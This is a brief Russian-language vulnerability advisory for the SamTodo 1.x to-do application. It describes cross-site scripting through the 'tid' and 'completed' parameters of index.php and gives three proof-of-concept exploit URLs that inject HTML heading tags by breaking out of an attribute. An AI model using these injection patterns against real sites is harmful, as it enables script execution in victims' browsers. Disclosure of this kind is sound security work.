Программа: SamTodo 1.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "tid" parameter (если "go" установлен в "main.taskeditor") и
в параметре "completed" (если "go" установлен в "main.default") сценарием
index.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в
контексте безопасности уязвимого сайта.
Эксплоит:
index.php?go=main.taskeditor&tid=f29de7fa-6625-4e20-8a19-
11c0f4d799f6%22%3E%3Ch1%3Eboo%3C/h1%3E&mode=edit
index.php?go=main.default&completed=1%22%3E%3Ch1%3Ef00bar%3C/h1%3E
index.php?go=main.default&orderBy=taskComplete&ascDesc= DESC&completed=1%22%3E%3Ch1%3Ef00bar%3C/h1%3E
